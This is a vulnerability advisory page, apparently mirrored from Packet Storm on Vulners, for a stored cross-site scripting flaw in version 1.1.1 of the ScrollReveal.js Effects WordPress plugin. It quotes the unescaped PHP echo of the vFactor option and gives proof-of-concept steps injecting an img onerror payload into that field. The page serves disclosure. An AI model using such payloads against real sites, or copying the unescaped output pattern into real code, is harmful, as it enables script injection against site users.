Lucene search
K

WordPress ScrollReveal.js Effects 1.1.1 Cross Site Scripting

🗓️ 25 Apr 2022 00:00:00Reported by Mariam TariqType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 215 Views

WordPress ScrollReveal.js Effects 1.1.1 Cross Site Scriptin

Code
`# Exploit Title: WordPress Plugin ScrollReveal.js Effects - Stored Cross Site Scripting  
# Date: 25-04-2022  
# Exploit Author: Mariam Tariq - Hunt3rsherlock_  
# Vendor Homepage: https://wordpress.org/plugins/scrollrevealjs-effects/  
# Version: 1.1.1  
# Tested on: Firefox  
# Contact me: [email protected]  
# Vulnerable Code:  
```  
<input id="src-opacity" type="text" name="sr_config[vFactor]" value="<?php  
echo $options['vFactor']; ?>" placeholder="Element ratio in float" />  
```  
# POC  
1. Install ScrollReveal.js Effects WordPress plugin and activate.  
2. Go to configuration and on vFactor field inject XSS payload “><img src=x  
onerror=alert(‘’XSS>  
3. XSS will trigger.  
  
## PoC Image  
https://imgur.com/a/uQRT2mD  
https://imgur.com/1BB80ep  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation